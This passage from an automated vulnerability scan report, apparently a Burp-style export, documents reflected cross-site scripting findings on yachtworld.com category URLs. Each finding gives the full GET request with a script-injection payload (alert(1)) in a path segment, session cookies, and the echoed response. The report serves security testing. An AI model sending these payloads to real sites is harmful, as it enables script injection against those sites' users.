savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:45 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Viking/1a34ab"><script>alert(1)</script>83b3d715e6b/A-1">
...[SNIP]...

3.290. http://www.yachtworld.com/boats/category/type/Wellcraft/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Wellcraft/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a2c7"><script>alert(1)</script>cd709be7fb4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type4a2c7"><script>alert(1)</script>cd709be7fb4/Wellcraft/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:41 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type4a2c7"><script>alert(1)</script>cd709be7fb4/260+Cruiser">
...[SNIP]...

3.291. http://www.yachtworld.com/boats/category/type/Wellcraft/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Wellcraft/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80950"><a>1be00cce2bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Wellcraft80950"><a>1be00cce2bc/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

3.292. http://www.yachtworld.com/boats/category/type/Wellcraft/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Wellcraft/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a5d1"><script>alert(1)</script>2041f45c7df was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Wellcraft/16a5d1"><script>alert(1)</script>2041f45c7df HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:54 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Wellcraft/16a5d1"><script>alert(1)</script>2041f45c7df/A-1">
...[SNIP]...

3.293. http://www.yachtworld.com/boats/category/type/builder/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10d9e"><script>alert(1)</script>8dd5d93dec8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type10d9e"><script>alert(1)</script>8dd5d93dec8/builder/ HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:15 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type10d9e"><script>alert(1)</script>8dd5d93dec8/260+Cruiser">
...[SNIP]...

3.294. http://www.yachtworld.com/boats/category/type/builder/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 510ea"><a>6797f0627a5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/builder510ea"><a>6797f0627a5/ HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 